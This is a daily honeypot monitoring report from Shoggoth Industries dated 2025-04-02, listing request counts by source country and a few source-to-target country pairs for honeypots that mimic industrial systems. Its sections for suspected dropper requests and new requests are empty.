Report: 2025-04-02

Author
Shoggoth Industries
Daily Report: 2025-04-02

Interaction report on the HTTP services of various honeypots around the world.

ot_simplified_report

Simplified report for medium-level interactions with honeypots that mimic industrial systems (website loading or interactions with the website). For more, contact us at social@shoggoth.industries.

| source_country | targeted_country |
| --- | --- |
| US | Germany |
| US | Germany |
| JP | Germany |
| US | Germany |
| US | Germany |
| US | Dubai |
| US | Dubai |
| PT | |

botnet_dropper_behaviour

List of requests suspected of having stage 1 dropper behavior (programs designed to extract other files from their own code).


request

List of the day's requests that had never been detected before; other requests have already been detected and archived in the request database.


country_iso_code

List of country ISO codes and the number of requests received from IPs located in those countries.

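| | number_of_occurence | country_iso_code |
| --- | --- | --- |
| 0 | 1027 | NL |
| 1 | 336 | US |
| 2 | 175 | BG |
| 3 | 162 | GB |
| 4 | 96 | DE |
| 5 | 90 | HK |
| 6 | 84 | PL |
| 7 | 83 | TW |
| 8 | 68 | CN |
| 9 | 56 | PT |
| 10 | 51 | SC |
| 11 | 50 | BE |
| 12 | 49 | BR |
| 13 | 48 | ES |
| 14 | 30 | IN |
| 15 | 24 | KR |
| 16 | 16 | TR |
| 17 | 16 | UA |
| 18 | 12 | NG |
| 19 | 9 | RO |
| 20 | 8 | MN |
| 21 | 8 | JP |
| 22 | 6 | ZA |
| 23 | 6 | CH |
| 24 | 6 | FR |
| 25 | 6 | CA |
| 26 | 5 | SG |
| 27 | 5 | VN |
| 28 | 4 | IT |
| 29 | 3 | AR |
| 30 | 3 | IR |
| 31 | 3 | AZ |
| 32 | 3 | MY |
| 33 | 2 | TH |
| 34 | 2 | AE |
| 35 | 2 | RU |
| 36 | 2 | MC |
| 37 | 2 | AO |
| 38 | 1 | KH |
| 39 | 1 | ID |
| 40 | 1 | LB |
| 41 | 1 | BA |
| 42 | 1 | MK |
| 43 | 1 | MD |
| 44 | 1 | LU |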
